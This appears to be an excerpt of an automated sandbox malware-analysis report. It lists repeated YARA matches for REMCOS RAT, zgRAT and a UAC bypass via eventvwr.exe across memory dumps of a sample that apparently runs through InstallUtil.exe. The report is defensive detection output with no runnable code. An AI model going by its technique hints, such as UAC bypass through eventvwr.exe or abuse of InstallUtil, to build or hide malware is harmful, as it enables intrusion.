Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown

.NET source code contains very large array initializations

Source: kyFBQxVbsg.exe, hlrb.cs	Large array initialization: nakj: array initializer size 710623
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrb.cs	Large array initialization: nakj: array initializer size 710623

Detected potential crypto function

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AEAB8	0_2_024AEAB8
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024ADA50	0_2_024ADA50
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024AD778	0_2_024AD778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8EAF7	3_2_00C8EAF7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AEC8	3_2_00C8AEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF53	3_2_00C8AF53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8768A	3_2_00C8768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C87698	3_2_00C87698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8AF90	3_2_00C8AF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00435080	17_2_00435080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044F09C	17_2_0044F09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043420E	17_2_0043420E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00430294	17_2_00430294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004422B0	17_2_004422B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00411466	17_2_00411466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041A4FE	17_2_0041A4FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C57C	17_2_0043C57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434643	17_2_00434643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00424604	17_2_00424604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004496B9	17_2_004496B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0042476D	17_2_0042476D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00432771	17_2_00432771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C7AB	17_2_0043C7AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004338FA	17_2_004338FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004239CC	17_2_004239CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043C9DA	17_2_0043C9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00434A78	17_2_00434A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0041BA96	17_2_0041BA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00433DF6	17_2_00433DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00423F5B	17_2_00423F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044FF65	17_2_0044FF65

PE file contains strange resources

Source: kyFBQxVbsg.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Qerdo.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
